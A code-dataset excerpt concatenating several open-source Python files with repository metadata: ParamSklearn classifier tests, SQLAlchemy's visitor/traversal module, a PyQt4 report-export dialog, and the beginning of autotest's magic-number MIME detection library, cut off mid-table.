epoch" in \ e.args[0] or \ "removed all features" in e.args[0] or \ "all features are discarded" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except RuntimeWarning as e: if "invalid value encountered in sqrt" in e.args[0]: continue elif "divide by zero encountered in" in e.args[0]: continue elif "invalid value encountered in divide" in e.args[0]: continue elif "invalid value encountered in true_divide" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except UserWarning as e: if "FastICA did not converge" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except MemoryError as e: continue def test_configurations_signed_data(self): # Use a limit of ~4GiB limit = 4000 * 1024 * 1024 resource.setrlimit(resource.RLIMIT_AS, (limit, limit)) cs = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'signed': True}) print(cs) for i in range(10): config = cs.sample_configuration() config._populate_values() if config['classifier:passive_aggressive:n_iter'] is not None: config._values['classifier:passive_aggressive:n_iter'] = 5 if config['classifier:sgd:n_iter'] is not None: config._values['classifier:sgd:n_iter'] = 5 X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits') cls = ParamSklearnClassifier(config, random_state=1) print(config) try: cls.fit(X_train, Y_train) X_test_ = X_test.copy() predictions = cls.predict(X_test) self.assertIsInstance(predictions, np.ndarray) predicted_probabiliets = cls.predict_proba(X_test_) self.assertIsInstance(predicted_probabiliets, np.ndarray) except ValueError as e: if "Floating-point under-/overflow occurred at epoch" in \ e.args[0] or \ "removed all features" in e.args[0] or \ "all features are discarded" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except RuntimeWarning as e: if "invalid value encountered in sqrt" in e.args[0]: continue elif "divide by zero encountered in" in e.args[0]: continue elif "invalid value encountered in divide" in e.args[0]: continue elif "invalid value encountered in true_divide" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except UserWarning as e: if "FastICA did not converge" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except MemoryError as e: continue def test_configurations_sparse(self): # Use a limit of ~4GiB limit = 4000 * 1024 * 1024 resource.setrlimit(resource.RLIMIT_AS, (limit, limit)) cs = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'sparse': True}) print(cs) for i in range(10): config = cs.sample_configuration() config._populate_values() if config['classifier:passive_aggressive:n_iter'] is not None: config._values['classifier:passive_aggressive:n_iter'] = 5 if config['classifier:sgd:n_iter'] is not None: config._values['classifier:sgd:n_iter'] = 5 print(config) X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits', make_sparse=True) cls = ParamSklearnClassifier(config, random_state=1) try: cls.fit(X_train, Y_train) predictions = cls.predict(X_test) except ValueError as e: if "Floating-point under-/overflow occurred at epoch" in \ e.args[0] or \ "removed all features" in e.args[0] or \ "all features are discarded" in e.args[0]: continue else: print(config) traceback.print_tb(sys.exc_info()[2]) raise e except RuntimeWarning as e: if "invalid value encountered in sqrt" in e.args[0]: continue elif "divide by zero encountered in" in e.args[0]: continue elif "invalid value encountered in divide" in e.args[0]: continue elif "invalid value encountered in true_divide" in e.args[0]: continue else: print(config) raise e except UserWarning as e: if "FastICA did not converge" in e.args[0]: continue else: print(config) raise e def test_configurations_categorical_data(self): # Use a limit of ~4GiB limit = 4000 * 1024 * 1024 resource.setrlimit(resource.RLIMIT_AS, (limit, limit)) cs = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'sparse': True}) print(cs) for i in range(10): config = cs.sample_configuration() config._populate_values() if config['classifier:passive_aggressive:n_iter'] is not None: config._values['classifier:passive_aggressive:n_iter'] = 5 if config['classifier:sgd:n_iter'] is not None: config._values['classifier:sgd:n_iter'] = 5 print(config) categorical = [True, True, True, False, False, True, True, True, False, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, False, False, False, True, True, True] this_directory = os.path.dirname(__file__) X = np.loadtxt(os.path.join(this_directory, "components", "data_preprocessing", "dataset.pkl")) y = X[:, -1].copy() X = X[:,:-1] X_train, X_test, Y_train, Y_test = \ sklearn.cross_validation.train_test_split(X, y) cls = ParamSklearnClassifier(config, random_state=1,) try: cls.fit(X_train, Y_train, init_params={'one_hot_encoding:categorical_features': categorical}) predictions = cls.predict(X_test) except ValueError as e: if "Floating-point under-/overflow occurred at epoch" in \ e.args[0] or \ "removed all features" in e.args[0] or \ "all features are discarded" in e.args[0]: continue else: print(config) traceback.print_tb(sys.exc_info()[2]) raise e except RuntimeWarning as e: if "invalid value encountered in sqrt" in e.args[0]: continue elif "divide by zero encountered in" in e.args[0]: continue elif "invalid value encountered in divide" in e.args[0]: continue elif "invalid value encountered in true_divide" in e.args[0]: continue else: print(config) raise e except UserWarning as e: if "FastICA did not converge" in e.args[0]: continue else: print(config) raise e def test_get_hyperparameter_search_space(self): cs = ParamSklearnClassifier.get_hyperparameter_search_space() self.assertIsInstance(cs, ConfigurationSpace) conditions = cs.get_conditions() self.assertEqual(len(cs.get_hyperparameter( 'rescaling:__choice__').choices), 4) self.assertEqual(len(cs.get_hyperparameter( 'classifier:__choice__').choices), 16) self.assertEqual(len(cs.get_hyperparameter( 'preprocessor:__choice__').choices), 14) hyperparameters = cs.get_hyperparameters() self.assertEqual(145, len(hyperparameters)) #for hp in sorted([str(h) for h in hyperparameters]): # print hp # The four parameters which are always active are classifier, # preprocessor, imputation strategy and scaling strategy self.assertEqual(len(hyperparameters) - 6, len(conditions)) def test_get_hyperparameter_search_space_include_exclude_models(self): cs = ParamSklearnClassifier.get_hyperparameter_search_space( include={'classifier': ['libsvm_svc']}) self.assertEqual(cs.get_hyperparameter('classifier:__choice__'), CategoricalHyperparameter('classifier:__choice__', ['libsvm_svc'])) cs = ParamSklearnClassifier.get_hyperparameter_search_space( exclude={'classifier': ['libsvm_svc']}) self.assertNotIn('libsvm_svc', str(cs)) cs = ParamSklearnClassifier.get_hyperparameter_search_space( include={'preprocessor': ['select_percentile_classification']}) self.assertEqual(cs.get_hyperparameter('preprocessor:__choice__'), CategoricalHyperparameter('preprocessor:__choice__', ['select_percentile_classification'])) cs = ParamSklearnClassifier.get_hyperparameter_search_space( exclude={'preprocessor': ['select_percentile_classification']}) self.assertNotIn('select_percentile_classification', str(cs)) def test_get_hyperparameter_search_space_preprocessor_contradicts_default_classifier(self): cs = ParamSklearnClassifier.get_hyperparameter_search_space( include={'preprocessor': ['densifier']}, dataset_properties={'sparse': True}) self.assertEqual(cs.get_hyperparameter('classifier:__choice__').default, 'qda') cs = ParamSklearnClassifier.get_hyperparameter_search_space( include={'preprocessor': ['nystroem_sampler']}) self.assertEqual(cs.get_hyperparameter('classifier:__choice__').default, 'sgd') def test_get_hyperparameter_search_space_only_forbidden_combinations(self): self.assertRaisesRegexp(AssertionError, "No valid pipeline found.", ParamSklearnClassifier.get_hyperparameter_search_space, include={'classifier': ['multinomial_nb'], 'preprocessor': ['pca']}, dataset_properties={'sparse':True}) # It must also be catched that no classifiers which can handle sparse # data are located behind the densifier self.assertRaisesRegexp(ValueError, "Cannot find a legal default " "configuration.", ParamSklearnClassifier.get_hyperparameter_search_space, include={'classifier': ['liblinear_svc'], 'preprocessor': ['densifier']}, dataset_properties={'sparse': True}) @unittest.skip("Wait until HPOlibConfigSpace is fixed.") def test_get_hyperparameter_search_space_dataset_properties(self): cs_mc = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'multiclass': True}) self.assertNotIn('bernoulli_nb', str(cs_mc)) cs_ml = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'multilabel': True}) self.assertNotIn('k_nearest_neighbors', str(cs_ml)) self.assertNotIn('liblinear', str(cs_ml)) self.assertNotIn('libsvm_svc', str(cs_ml)) self.assertNotIn('sgd', str(cs_ml)) cs_sp = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'sparse': True}) self.assertIn('extra_trees', str(cs_sp)) self.assertIn('gradient_boosting', str(cs_sp)) self.assertIn('random_forest', str(cs_sp)) cs_mc_ml = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'multilabel': True, 'multiclass': True}) self.assertEqual(cs_ml, cs_mc_ml) def test_predict_batched(self): cs = ParamSklearnClassifier.get_hyperparameter_search_space() default = cs.get_default_configuration() cls = ParamSklearnClassifier(default) # Multiclass X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits') cls.fit(X_train, Y_train) X_test_ = X_test.copy() prediction_ = cls.predict(X_test_) cls_predict = mock.Mock(wraps=cls.pipeline_) cls.pipeline_ = cls_predict prediction = cls.predict(X_test, batch_size=20) self.assertEqual((1647,), prediction.shape) self.assertEqual(83, cls_predict.predict.call_count) assert_array_almost_equal(prediction_, prediction) # Multilabel X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits') Y_train = np.array([(y, 26 - y) for y in Y_train]) cls.fit(X_train, Y_train) X_test_ = X_test.copy() prediction_ = cls.predict(X_test_) cls_predict = mock.Mock(wraps=cls.pipeline_) cls.pipeline_ = cls_predict prediction = cls.predict(X_test, batch_size=20) self.assertEqual((1647, 2), prediction.shape) self.assertEqual(83, cls_predict.predict.call_count) assert_array_almost_equal(prediction_, prediction) def test_predict_batched_sparse(self): cs = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'sparse': True}) config = Configuration(cs, values={"balancing:strategy": "none", "classifier:__choice__": "random_forest", "imputation:strategy": "mean", "one_hot_encoding:minimum_fraction": 0.01, "one_hot_encoding:use_minimum_fraction": "True", "preprocessor:__choice__": "no_preprocessing", 'classifier:random_forest:bootstrap': 'True', 'classifier:random_forest:criterion': 'gini', 'classifier:random_forest:max_depth': 'None', 'classifier:random_forest:min_samples_split': 2, 'classifier:random_forest:min_samples_leaf': 2, 'classifier:random_forest:max_features': 0.5, 'classifier:random_forest:max_leaf_nodes': 'None', 'classifier:random_forest:n_estimators': 100, 'classifier:random_forest:min_weight_fraction_leaf': 0.0, "rescaling:__choice__": "min/max"}) cls = ParamSklearnClassifier(config) # Multiclass X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits', make_sparse=True) cls.fit(X_train, Y_train) X_test_ = X_test.copy() prediction_ = cls.predict(X_test_) cls_predict = mock.Mock(wraps=cls.pipeline_) cls.pipeline_ = cls_predict prediction = cls.predict(X_test, batch_size=20) self.assertEqual((1647,), prediction.shape) self.assertEqual(83, cls_predict.predict.call_count) assert_array_almost_equal(prediction_, prediction) # Multilabel X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits', make_sparse=True) Y_train = np.array([(y, 26 - y) for y in Y_train]) cls.fit(X_train, Y_train) X_test_ = X_test.copy() prediction_ = cls.predict(X_test_) cls_predict = mock.Mock(wraps=cls.pipeline_) cls.pipeline_ = cls_predict prediction = cls.predict(X_test, batch_size=20) self.assertEqual((1647, 2), prediction.shape) self.assertEqual(83, cls_predict.predict.call_count) assert_array_almost_equal(prediction_, prediction) def test_predict_proba_batched(self): cs = ParamSklearnClassifier.get_hyperparameter_search_space() default = cs.get_default_configuration() # Multiclass cls = ParamSklearnClassifier(default) X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits') cls.fit(X_train, Y_train) X_test_ = X_test.copy() prediction_ = cls.predict_proba(X_test_) # The object behind the last step in the pipeline cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1]) cls.pipeline_.steps[-1] = ("estimator", cls_predict) prediction = cls.predict_proba(X_test, batch_size=20) self.assertEqual((1647, 10), prediction.shape) self.assertEqual(84, cls_predict.predict_proba.call_count) assert_array_almost_equal(prediction_, prediction) # Multilabel cls = ParamSklearnClassifier(default) X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits') Y_train = np.array([(y, 26 - y) for y in Y_train]) cls.fit(X_train, Y_train) X_test_ = X_test.copy() prediction_ = cls.predict_proba(X_test_) cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1]) cls.pipeline_.steps[-1] = ("estimator", cls_predict) prediction = cls.predict_proba(X_test, batch_size=20) self.assertIsInstance(prediction, list) self.assertEqual(2, len(prediction)) self.assertEqual((1647, 10), prediction[0].shape) self.assertEqual((1647, 10), prediction[1].shape) self.assertEqual(84, cls_predict.predict_proba.call_count) assert_array_almost_equal(prediction_, prediction) def test_predict_proba_batched_sparse(self): cs = ParamSklearnClassifier.get_hyperparameter_search_space( dataset_properties={'sparse': True}) config = Configuration(cs, values={"balancing:strategy": "none", "classifier:__choice__": "random_forest", "imputation:strategy": "mean", "one_hot_encoding:minimum_fraction": 0.01, "one_hot_encoding:use_minimum_fraction": 'True', "preprocessor:__choice__": "no_preprocessing", 'classifier:random_forest:bootstrap': 'True', 'classifier:random_forest:criterion': 'gini', 'classifier:random_forest:max_depth': 'None', 'classifier:random_forest:min_samples_split': 2, 'classifier:random_forest:min_samples_leaf': 2, 'classifier:random_forest:min_weight_fraction_leaf': 0.0, 'classifier:random_forest:max_features': 0.5, 'classifier:random_forest:max_leaf_nodes': 'None', 'classifier:random_forest:n_estimators': 100, "rescaling:__choice__": "min/max"}) # Multiclass cls = ParamSklearnClassifier(config) X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits', make_sparse=True) cls.fit(X_train, Y_train) X_test_ = X_test.copy() prediction_ = cls.predict_proba(X_test_) # The object behind the last step in the pipeline cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1]) cls.pipeline_.steps[-1] = ("estimator", cls_predict) prediction = cls.predict_proba(X_test, batch_size=20) self.assertEqual((1647, 10), prediction.shape) self.assertEqual(84, cls_predict.predict_proba.call_count) assert_array_almost_equal(prediction_, prediction) # Multilabel cls = ParamSklearnClassifier(config) X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits', make_sparse=True) Y_train = np.array([(y, 26 - y) for y in Y_train]) cls.fit(X_train, Y_train) X_test_ = X_test.copy() prediction_ = cls.predict_proba(X_test_) cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1]) cls.pipeline_.steps[-1] = ("estimator", cls_predict) prediction = cls.predict_proba(X_test, batch_size=20) self.assertIsInstance(prediction, list) self.assertEqual(2, len(prediction)) self.assertEqual((1647, 10), prediction[0].shape) self.assertEqual((1647, 10), prediction[1].shape) self.assertEqual(84, cls_predict.predict_proba.call_count) assert_array_almost_equal(prediction_, prediction) @unittest.skip("test_check_random_state Not yet Implemented") def test_check_random_state(self): raise NotImplementedError() @unittest.skip("test_validate_input_X Not yet Implemented") def test_validate_input_X(self): raise NotImplementedError() @unittest.skip("test_validate_input_Y Not yet Implemented") def test_validate_input_Y(self): raise NotImplementedError() def test_set_params(self): pass def test_get_params(self): pass
bsd-3-clause
5,577,714,242,644,063,000
44.762811
106
0.551766
false
Drvanon/Game
venv/lib/python3.3/site-packages/sqlalchemy/sql/visitors.py
1
10003
# sql/visitors.py # Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """Visitor/traversal interface and library functions. SQLAlchemy schema and expression constructs rely on a Python-centric version of the classic "visitor" pattern as the primary way in which they apply functionality. The most common use of this pattern is statement compilation, where individual expression classes match up to rendering methods that produce a string result. Beyond this, the visitor system is also used to inspect expressions for various information and patterns, as well as for usage in some kinds of expression transformation. Other kinds of transformation use a non-visitor traversal system. For many examples of how the visit system is used, see the sqlalchemy.sql.util and the sqlalchemy.sql.compiler modules. For an introduction to clause adaption, see http://techspot.zzzeek.org/2008/01/23/expression-transformations/ """ from collections import deque from .. import util import operator from .. import exc __all__ = ['VisitableType', 'Visitable', 'ClauseVisitor', 'CloningVisitor', 'ReplacingCloningVisitor', 'iterate', 'iterate_depthfirst', 'traverse_using', 'traverse', 'cloned_traverse', 'replacement_traverse'] class VisitableType(type): """Metaclass which assigns a `_compiler_dispatch` method to classes having a `__visit_name__` attribute. The _compiler_dispatch attribute becomes an instance method which looks approximately like the following:: def _compiler_dispatch (self, visitor, **kw): '''Look for an attribute named "visit_" + self.__visit_name__ on the visitor, and call it with the same kw params.''' visit_attr = 'visit_%s' % self.__visit_name__ return getattr(visitor, visit_attr)(self, **kw) Classes having no __visit_name__ attribute will remain unaffected. """ def __init__(cls, clsname, bases, clsdict): if cls.__name__ == 'Visitable' or not hasattr(cls, '__visit_name__'): super(VisitableType, cls).__init__(clsname, bases, clsdict) return _generate_dispatch(cls) super(VisitableType, cls).__init__(clsname, bases, clsdict) def _generate_dispatch(cls): """Return an optimized visit dispatch function for the cls for use by the compiler. """ if '__visit_name__' in cls.__dict__: visit_name = cls.__visit_name__ if isinstance(visit_name, str): # There is an optimization opportunity here because the # the string name of the class's __visit_name__ is known at # this early stage (import time) so it can be pre-constructed. getter = operator.attrgetter("visit_%s" % visit_name) def _compiler_dispatch(self, visitor, **kw): try: meth = getter(visitor) except AttributeError: raise exc.UnsupportedCompilationError(visitor, cls) else: return meth(self, **kw) else: # The optimization opportunity is lost for this case because the # __visit_name__ is not yet a string. As a result, the visit # string has to be recalculated with each compilation. def _compiler_dispatch(self, visitor, **kw): visit_attr = 'visit_%s' % self.__visit_name__ try: meth = getattr(visitor, visit_attr) except AttributeError: raise exc.UnsupportedCompilationError(visitor, cls) else: return meth(self, **kw) _compiler_dispatch.__doc__ = \ """Look for an attribute named "visit_" + self.__visit_name__ on the visitor, and call it with the same kw params. """ cls._compiler_dispatch = _compiler_dispatch class Visitable(object, metaclass=VisitableType): """Base class for visitable objects, applies the ``VisitableType`` metaclass. """ class ClauseVisitor(object): """Base class for visitor objects which can traverse using the traverse() function. """ __traverse_options__ = {} def traverse_single(self, obj, **kw): for v in self._visitor_iterator: meth = getattr(v, "visit_%s" % obj.__visit_name__, None) if meth: return meth(obj, **kw) def iterate(self, obj): """traverse the given expression structure, returning an iterator of all elements. """ return iterate(obj, self.__traverse_options__) def traverse(self, obj): """traverse and visit the given expression structure.""" return traverse(obj, self.__traverse_options__, self._visitor_dict) @util.memoized_property def _visitor_dict(self): visitors = {} for name in dir(self): if name.startswith('visit_'): visitors[name[6:]] = getattr(self, name) return visitors @property def _visitor_iterator(self): """iterate through this visitor and each 'chained' visitor.""" v = self while v: yield v v = getattr(v, '_next', None) def chain(self, visitor): """'chain' an additional ClauseVisitor onto this ClauseVisitor. the chained visitor will receive all visit events after this one. """ tail = list(self._visitor_iterator)[-1] tail._next = visitor return self class CloningVisitor(ClauseVisitor): """Base class for visitor objects which can traverse using the cloned_traverse() function. """ def copy_and_process(self, list_): """Apply cloned traversal to the given list of elements, and return the new list. """ return [self.traverse(x) for x in list_] def traverse(self, obj): """traverse and visit the given expression structure.""" return cloned_traverse( obj, self.__traverse_options__, self._visitor_dict) class ReplacingCloningVisitor(CloningVisitor): """Base class for visitor objects which can traverse using the replacement_traverse() function. """ def replace(self, elem): """receive pre-copied elements during a cloning traversal. If the method returns a new element, the element is used instead of creating a simple copy of the element. Traversal will halt on the newly returned element if it is re-encountered. """ return None def traverse(self, obj): """traverse and visit the given expression structure.""" def replace(elem): for v in self._visitor_iterator: e = v.replace(elem) if e is not None: return e return replacement_traverse(obj, self.__traverse_options__, replace) def iterate(obj, opts): """traverse the given expression structure, returning an iterator. traversal is configured to be breadth-first. """ stack = deque([obj]) while stack: t = stack.popleft() yield t for c in t.get_children(**opts): stack.append(c) def iterate_depthfirst(obj, opts): """traverse the given expression structure, returning an iterator. traversal is configured to be depth-first. """ stack = deque([obj]) traversal = deque() while stack: t = stack.pop() traversal.appendleft(t) for c in t.get_children(**opts): stack.append(c) return iter(traversal) def traverse_using(iterator, obj, visitors): """visit the given expression structure using the given iterator of objects. """ for target in iterator: meth = visitors.get(target.__visit_name__, None) if meth: meth(target) return obj def traverse(obj, opts, visitors): """traverse and visit the given expression structure using the default iterator. """ return traverse_using(iterate(obj, opts), obj, visitors) def traverse_depthfirst(obj, opts, visitors): """traverse and visit the given expression structure using the depth-first iterator. """ return traverse_using(iterate_depthfirst(obj, opts), obj, visitors) def cloned_traverse(obj, opts, visitors): """clone the given expression structure, allowing modifications by visitors.""" cloned = util.column_dict() stop_on = util.column_set(opts.get('stop_on', [])) def clone(elem): if elem in stop_on: return elem else: if id(elem) not in cloned: cloned[id(elem)] = newelem = elem._clone() newelem._copy_internals(clone=clone) meth = visitors.get(newelem.__visit_name__, None) if meth: meth(newelem) return cloned[id(elem)] if obj is not None: obj = clone(obj) return obj def replacement_traverse(obj, opts, replace): """clone the given expression structure, allowing element replacement by a given replacement function.""" cloned = util.column_dict() stop_on = util.column_set([id(x) for x in opts.get('stop_on', [])]) def clone(elem, **kw): if id(elem) in stop_on or \ 'no_replacement_traverse' in elem._annotations: return elem else: newelem = replace(elem) if newelem is not None: stop_on.add(id(newelem)) return newelem else: if elem not in cloned: cloned[elem] = newelem = elem._clone() newelem._copy_internals(clone=clone, **kw) return cloned[elem] if obj is not None: obj = clone(obj, **opts) return obj
apache-2.0
6,985,493,977,411,155,000
30.755556
84
0.615615
false
tedlaz/pyted
tests/pyappgen/pyappgen/qtreports.py
1
3002
# -*- coding: utf-8 -*- ''' Created on 2014-01-24 @author: tedlaz ''' from PyQt4 import QtGui, Qt class rptDlg(QtGui.QDialog): def __init__(self,html=u'Δοκιμή',title='Document1',parent=None): super(rptDlg, self).__init__(parent) self.setAttribute(Qt.Qt.WA_DeleteOnClose) self.odtName = '%s.odt' % title self.pdfName = '%s.pdf' % title self.setWindowTitle(title) self.editor = QtGui.QTextEdit(self) self.editor.setFont(QtGui.QFont('Arial',12)) self.buttonPdf = QtGui.QPushButton(u'Εξαγωγή σε pdf', self) self.buttonPdf.clicked.connect(self.saveAsPdf) self.buttonOdt = QtGui.QPushButton(u'Εξαγωγή σε odt', self) self.buttonOdt.clicked.connect(self.saveAsOdt) self.buttonPreview = QtGui.QPushButton(u'Προεπισκόπιση', self) self.buttonPreview.clicked.connect(self.handlePreview) layout = QtGui.QGridLayout(self) layout.addWidget(self.editor, 0, 0, 1, 3) layout.addWidget(self.buttonPdf, 1, 0) layout.addWidget(self.buttonOdt, 1, 1) layout.addWidget(self.buttonPreview, 1, 2) self.editor.setHtml(html) def handlePrint(self): dialog = QtGui.QPrintDialog() if dialog.exec_() == QtGui.QDialog.Accepted: self.editor.document().print_(dialog.printer()) def saveAsPdf(self): fname = '%s' % QtGui.QFileDialog.getSaveFileName(self, u"Αποθήκευση σε μορφή pdf", self.pdfName, "pdf (*.pdf)") if fname: printer = QtGui.QPrinter() printer.setOutputFormat(QtGui.QPrinter.PdfFormat) printer.setOutputFileName(fname) self.editor.document().print_(printer) def saveAsOdt(self): fname = '%s' % QtGui.QFileDialog.getSaveFileName(self, u"Αποθήκευση σε μορφή Libre Office (odt)", self.odtName, "Libre Office (*.odt)") if fname: doc = QtGui.QTextDocument() cursor = QtGui.QTextCursor(doc) cursor.insertHtml(self.editor.toHtml()) writer = QtGui.QTextDocumentWriter() odf_format = writer.supportedDocumentFormats()[1] writer.setFormat(odf_format) writer.setFileName(fname) writer.write(doc) def handlePreview(self): dialog = QtGui.QPrintPreviewDialog() dialog.paintRequested.connect(self.editor.print_) dialog.exec_() if __name__ == "__main__": import sys import test_printHtml app = QtGui.QApplication(sys.argv) window = rptDlg(test_printHtml.toHtml(),test_printHtml.reportTitle) window.resize(640, 480) window.show() sys.exit(app.exec_())
gpl-3.0
1,066,857,860,350,338,000
32.104651
71
0.574207
false
libvirt/autotest
client/common_lib/magic.py
1
58623
#!/usr/bin/python """ Library used to determine a file MIME type by its magic number, it doesn't have any external dependencies. Based on work of Jason Petrone (jp_py@jsnp.net), adapted to autotest. Command Line Usage: Running as 'python magic.py file_path' will print a mime string (or just a description) of the file present on file_path. API Usage: magic.guess_type(file_path) - Returns a description of what the file on path 'file' contains. This function name was chosen due to a similar function on python standard library 'mimetypes'. @license: GPL v2 @copyright: Jason Petrone (jp_py@jsnp.net) 2000 @copyright: Lucas Meneghel Rodrigues (lmr@redhat.com) 2010 @see: http://www.jsnp.net/code/magic.py """ import logging, optparse, os, re, sys, string, struct import logging_config, logging_manager def _str_to_num(n): """ Convert a hex or octal string to a decimal number. @param n: Hex or octal string to be converted. @return: Resulting decimal number. """ val = 0 col = long(1) if n[:1] == 'x': n = '0' + n if n[:2] == '0x': # hex n = string.lower(n[2:]) while len(n) > 0: l = n[len(n) - 1] val = val + string.hexdigits.index(l) * col col = col * 16 n = n[:len(n)-1] elif n[0] == '\\': # octal n = n[1:] while len(n) > 0: l = n[len(n) - 1] if ord(l) < 48 or ord(l) > 57: break val = val + int(l) * col col = col * 8 n = n[:len(n)-1] else: val = string.atol(n) return val class MagicLoggingConfig(logging_config.LoggingConfig): def configure_logging(self, results_dir=None, verbose=False): super(MagicLoggingConfig, self).configure_logging(use_console=True, verbose=verbose) class MagicTest(object): """ Compile a magic database entry so it can be compared with data read from files. """ def __init__(self, offset, t, op, value, msg, mask=None): """ Reads magic database data. Maps the list fields into class attributes. @param offset: Offset from start of the file. @param t: Type of the magic data. @param op: Operation to be performed when comparing the data. @param value: Expected value of the magic data for a given data type. @param msg: String representing the file mimetype. """ if t.count('&') > 0: mask = _str_to_num(t[t.index('&')+1:]) t = t[:t.index('&')] if type(offset) == type('a'): self.offset = _str_to_num(offset) else: self.offset = offset self.type = t self.msg = msg self.subTests = [] self.op = op self.mask = mask self.value = value def test(self, data): """ Compare data read from file with self.value if operator is '='. @param data: Data read from the file. @return: None if no match between data and expected value string. Else, print matching mime type information. """ if self.mask: data = data & self.mask if self.op == '=': if self.value == data: return self.msg elif self.op == '<': pass elif self.op == '>': pass elif self.op == '&': pass elif self.op == '^': pass return None def compare(self, data): """ Compare data read from the file with the expected data for this particular mime type register. @param data: Data read from the file. """ try: if self.type == 'string': c = ''; s = '' for i in range(0, len(self.value)+1): if i + self.offset > len(data) - 1: break s = s + c [c] = struct.unpack('c', data[self.offset + i]) data = s elif self.type == 'short': [data] = struct.unpack('h', data[self.offset:self.offset + 2]) elif self.type == 'leshort': [data] = struct.unpack('<h', data[self.offset:self.offset + 2]) elif self.type == 'beshort': [data] = struct.unpack('>H', data[self.offset:self.offset + 2]) elif self.type == 'long': [data] = struct.unpack('l', data[self.offset:self.offset + 4]) elif self.type == 'lelong': [data] = struct.unpack('<l', data[self.offset:self.offset + 4]) elif self.type == 'belong': [data] = struct.unpack('>l', data[self.offset:self.offset + 4]) else: pass except Exception: return None return self.test(data) magic_database = [ [0L, 'leshort', '=', 1538L, 'application/x-alan-adventure-game'], [0L, 'string', '=', 'TADS', 'application/x-tads-game'], [0L, 'short', '=', 420L, 'application/x-executable-file'], [0L, 'short', '=', 421L, 'application/x-executable-file'], [0L, 'leshort', '=', 603L, 'application/x-executable-file'], [0L, 'string', '=', 'Core\001', 'application/x-executable-file'], [0L, 'string', '=', 'AMANDA: TAPESTART DATE', 'application/x-amanda-header'], [0L, 'belong', '=', 1011L, 'application/x-executable-file'], [0L, 'belong', '=', 999L, 'application/x-library-file'], [0L, 'belong', '=', 435L, 'video/mpeg'], [0L, 'belong', '=', 442L, 'video/mpeg'], [0L, 'beshort&0xfff0', '=', 65520L, 'audio/mpeg'], [4L, 'leshort', '=', 44817L, 'video/fli'], [4L, 'leshort', '=', 44818L, 'video/flc'], [0L, 'string', '=', 'MOVI', 'video/x-sgi-movie'], [4L, 'string', '=', 'moov', 'video/quicktime'], [4L, 'string', '=', 'mdat', 'video/quicktime'], [0L, 'long', '=', 100554L, 'application/x-apl-workspace'], [0L, 'string', '=', 'FiLeStArTfIlEsTaRt', 'text/x-apple-binscii'], [0L, 'string', '=', '\012GL', 'application/data'], [0L, 'string', '=', 'v\377', 'application/data'], [0L, 'string', '=', 'NuFile', 'application/data'], [0L, 'string', '=', 'N\365F\351l\345', 'application/data'], [0L, 'belong', '=', 333312L, 'application/data'], [0L, 'belong', '=', 333319L, 'application/data'], [257L, 'string', '=', 'ustar\000', 'application/x-tar'], [257L, 'string', '=', 'ustar \000', 'application/x-gtar'], [0L, 'short', '=', 70707L, 'application/x-cpio'], [0L, 'short', '=', 143561L, 'application/x-bcpio'], [0L, 'string', '=', '070707', 'application/x-cpio'], [0L, 'string', '=', '070701', 'application/x-cpio'], [0L, 'string', '=', '070702', 'application/x-cpio'], [0L, 'string', '=', '!<arch>\012debian', 'application/x-dpkg'], [0L, 'string', '=', '\xed\xab\xee\xdb', 'application/x-rpm'], [0L, 'long', '=', 177555L, 'application/x-ar'], [0L, 'short', '=', 177555L, 'application/data'], [0L, 'long', '=', 177545L, 'application/data'], [0L, 'short', '=', 177545L, 'application/data'], [0L, 'long', '=', 100554L, 'application/x-apl-workspace'], [0L, 'string', '=', '<ar>', 'application/x-ar'], [0L, 'string', '=', '!<arch>\012__________E', 'application/x-ar'], [0L, 'string', '=', '-h-', 'application/data'], [0L, 'string', '=', '!<arch>', 'application/x-ar'], [0L, 'string', '=', '<ar>', 'application/x-ar'], [0L, 'string', '=', '<ar>', 'application/x-ar'], [0L, 'belong', '=', 1711210496L, 'application/x-ar'], [0L, 'belong', '=', 1013019198L, 'application/x-ar'], [0L, 'long', '=', 557605234L, 'application/x-ar'], [0L, 'lelong', '=', 177555L, 'application/data'], [0L, 'leshort', '=', 177555L, 'application/data'], [0L, 'lelong', '=', 177545L, 'application/data'], [0L, 'leshort', '=', 177545L, 'application/data'], [0L, 'lelong', '=', 236525L, 'application/data'], [0L, 'lelong', '=', 236526L, 'application/data'], [0L, 'lelong&0x8080ffff', '=', 2074L, 'application/x-arc'], [0L, 'lelong&0x8080ffff', '=', 2330L, 'application/x-arc'], [0L, 'lelong&0x8080ffff', '=', 538L, 'application/x-arc'], [0L, 'lelong&0x8080ffff', '=', 794L, 'application/x-arc'], [0L, 'lelong&0x8080ffff', '=', 1050L, 'application/x-arc'], [0L, 'lelong&0x8080ffff', '=', 1562L, 'application/x-arc'], [0L, 'string', '=', '\032archive', 'application/data'], [0L, 'leshort', '=', 60000L, 'application/x-arj'], [0L, 'string', 